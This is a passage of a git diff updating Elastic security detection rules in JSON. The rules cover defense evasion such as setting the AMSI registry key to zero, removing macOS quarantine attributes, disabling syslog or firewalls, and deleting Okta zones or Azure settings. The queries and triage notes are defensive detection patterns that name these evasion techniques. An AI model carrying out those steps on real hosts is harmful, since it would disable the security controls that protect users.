Retrieve scripts or Microsoft Office files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and\nmonitored by the security team, as these modifications expose the host to malware infections.\n\n### Related rules\n\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Delete or set the key to its default value.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Modification of AmsiEnable Registry Key\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and\nservices to integrate with any antimalware product that's present on a machine. AMSI provides integration with multiple\nWindows components, ranging from User Account Control (UAC) to VBA Macros.\n\nSince AMSI is widely used across security products for increased visibility, attackers can disable it to evade\ndetections that rely on it.\n\nThis rule monitors the modifications to the Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable registry key.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Retrieve scripts or Microsoft Office files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and\nmonitored by the security team, as these modifications expose the host to malware infections.\n\n### Related rules\n\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Delete or set the key to its default value.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "registry where event.type in (\"creation\", \"change\") and\n registry.path : (\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\"\n ) and\n registry.data.strings: (\"0\", \"0x00000000\")\n", "references": [ "https://hackinparis.com/data/slides/2019/talks/HIP2019-Dominic_Chell-Cracking_The_Perimeter_With_Sharpshooter.pdf", "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -54,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_apple_softupdates_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_apple_softupdates_modification.json index f354f521d168e..eaa234f555d18 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_apple_softupdates_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_apple_softupdates_modification.json @@ -18,6 +18,28 @@ "references": [ "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f683dcdf-a018-4801-b066-193d4ae6c8e5", "severity": "medium", @@ -54,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_del_quarantine_attrib.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_del_quarantine_attrib.json index b6e853b63dece..6e46811b60e59 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_del_quarantine_attrib.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_del_quarantine_attrib.json @@ -11,14 +11,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Attempt to Remove File Quarantine Attribute", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.args : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\" and process.command_line :\n (\n \"/bin/bash -c xattr -c *\",\n \"/bin/zsh -c xattr -c *\",\n \"/bin/sh -c xattr -c *\"\n )\n )\n )\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count > 12\n", "references": [ "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://ss64.com/osx/xattr.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/attempt_to_deactivate_okta_network_zone.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_deactivate_okta_network_zone.json similarity index 53% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/attempt_to_deactivate_okta_network_zone.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_deactivate_okta_network_zone.json index 8c8353f1d5f9c..bec75106eb02a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/attempt_to_deactivate_okta_network_zone.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_deactivate_okta_network_zone.json @@ -13,15 +13,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Deactivate an Okta Network Zone", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:zone.deactivate\n", "references": [ "https://help.okta.com/en/prod/Content/Topics/Security/network/network-zones.htm", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8a5c1e5f-ad63-481e-b53a-ef959230f7f1", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -29,9 +48,34 @@ "Okta", "Continuous Monitoring", "SecOps", - "Network Security" + "Network Security", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/attempt_to_delete_okta_network_zone.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_delete_okta_network_zone.json similarity index 52% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/attempt_to_delete_okta_network_zone.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_delete_okta_network_zone.json index 903475b441d01..4349c59ac38fa 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/attempt_to_delete_okta_network_zone.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_delete_okta_network_zone.json @@ -13,15 +13,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Delete an Okta Network Zone", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:zone.delete\n", "references": [ "https://help.okta.com/en/prod/Content/Topics/Security/network/network-zones.htm", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c749e367-a069-4a73-b1f2-43a3798153ad", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -29,9 +48,34 @@ "Okta", "Continuous Monitoring", "SecOps", - "Network Security" + "Network Security", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_gatekeeper.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_gatekeeper.json index 8a1f1482e603a..7a1d31f145db2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_gatekeeper.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_gatekeeper.json @@ -16,6 +16,23 @@ "https://support.apple.com/en-us/HT202491", "https://community.carbonblack.com/t5/Threat-Advisories-Documents/TAU-TIN-Shlayer-OSX/ta-p/68397" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "4da13d6e-904f-4636-81d8-6ab14b4e6ae9", "severity": "medium", @@ -45,5 +62,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_iptables_or_firewall.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_iptables_or_firewall.json deleted file mode 100644 index 3eb5f25298c72..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_iptables_or_firewall.json +++ /dev/null @@ -1,52 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic.", - "from": "now-9m", - "index": [ - "auditbeat-*", - "logs-endpoint.events.*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Attempt to Disable IPTables or Firewall", - "query": "event.category:process and event.type:(start or process_started) and\n process.name:ufw and process.args:(allow or disable or reset) or\n\n (((process.name:service and process.args:stop) or\n (process.name:chkconfig and process.args:off) or\n (process.name:systemctl and process.args:(disable or stop or kill))) and\n process.args:(firewalld or ip6tables or iptables))\n", - "risk_score": 47, - "rule_id": "125417b8-d3df-479f-8418-12d7e034fee3", - "severity": "medium", - "tags": [ - "Elastic", - "Host", - "Linux", - "Threat Detection", - "Defense Evasion" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 7 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_syslog_service.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_syslog_service.json index 610648df94d37..b2c0bf5ad3282 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_syslog_service.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_syslog_service.json @@ -12,6 +12,28 @@ "license": "Elastic License v2", "name": "Attempt to Disable Syslog Service", "query": "event.category:process and event.type:(start or process_started) and\n ((process.name:service and process.args:stop) or\n (process.name:chkconfig and process.args:off) or\n (process.name:systemctl and process.args:(disable or stop or kill)))\n and process.args:(syslog or rsyslog or \"syslog-ng\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "2f8a1226-5720-437d-9c20-e0029deb6194", "severity": "medium", @@ -48,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_application_credential_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_application_credential_modification.json index 5f96b81247942..6c745d65f7e48 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_application_credential_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_application_credential_modification.json @@ -14,13 +14,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Application Credential Modification", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Update application - Certificates and secrets management\" and event.outcome:(success or Success)\n", "references": [ "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "1a36cace-11a7-43a8-9a10-b497c5a02cd3", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -56,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_automation_runbook_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_automation_runbook_deleted.json new file mode 100644 index 0000000000000..951277d09f1b0 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_automation_runbook_deleted.json @@ -0,0 +1,73 @@ +{ + "author": [ + "Elastic" + ], + "description": "Identifies when an Azure Automation runbook is deleted. An adversary may delete an Azure Automation runbook in order to disrupt their target's automated business operations or to remove a malicious runbook for defense evasion.", + "from": "now-25m", + "index": [ + "filebeat-*", + "logs-azure*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Automation Runbook Deleted", + "note": "", + "query": "event.dataset:azure.activitylogs and\n azure.activitylogs.operation_name:\"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DELETE\" and \n event.outcome:(Success or success)\n", + "references": [ + "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor", + "https://github.com/hausec/PowerZure", + "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", + "https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "8ddab73b-3d15-4e5d-9413-47f05553c1d7", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Elastic", + "Cloud", + "Azure", + "Continuous Monitoring", + "SecOps", + "Configuration Audit", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 7 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_blob_permissions_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_blob_permissions_modified.json index 2b299df062662..b0ba35b1e6c15 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_blob_permissions_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_blob_permissions_modified.json @@ -13,13 +13,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Blob Permissions Modification", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:(\n \"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MANAGEOWNERSHIP/ACTION\" or\n \"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MODIFYPERMISSIONS/ACTION\") and \n event.outcome:(Success or success)\n", + "note": "", + "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:(\n \"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MANAGEOWNERSHIP/ACTION\" or\n \"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MODIFYPERMISSIONS/ACTION\") and\n event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d79c4b2a-6134-4edd-86e6-564a92a933f9", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -48,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_diagnostic_settings_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_diagnostic_settings_deletion.json index d9f70f88a23b7..5ec2a183daeea 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_diagnostic_settings_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_diagnostic_settings_deletion.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Diagnostic Settings Deletion", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/DELETE\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/azure-monitor/platform/diagnostic-settings" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -56,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_service_principal_addition.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_service_principal_addition.json index c715ea42e4b7e..508c453971304 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_service_principal_addition.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_service_principal_addition.json @@ -14,15 +14,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Service Principal Addition", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating Azure Service Principal Addition\n\nService Principals are identities used by applications, services, and automation tools to access specific resources.\nThey grant specific access based on the assigned API permissions. Most organizations that work a lot with Azure AD make\nuse of service principals. Whenever an application is registered, it automatically creates an application object and a\nservice principal in an Azure AD tenant.\n\nThis rule looks for the addition of service principals. This behavior may enable attackers to impersonate legitimate\nservice principals to camouflage their activities among noisy automations/apps.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Consider the source IP address and geolocation for the user who issued the command. Do they look normal for the user?\n- Consider the time of day. If the user is a human, not a program or script, did the activity take place during a normal\ntime of day?\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Examine the account's commands, API calls, and data management actions in the last 24 hours.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\nIf this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and device conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Add service principal\" and event.outcome:(success or Success)\n", "references": [ "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/", "https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal" ], - "risk_score": 47, + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 21, "rule_id": "60b6b72f-0fbc-47e7-9895-9ba7627a8b50", - "severity": "medium", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", "tags": [ "Elastic", "Cloud", @@ -57,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", 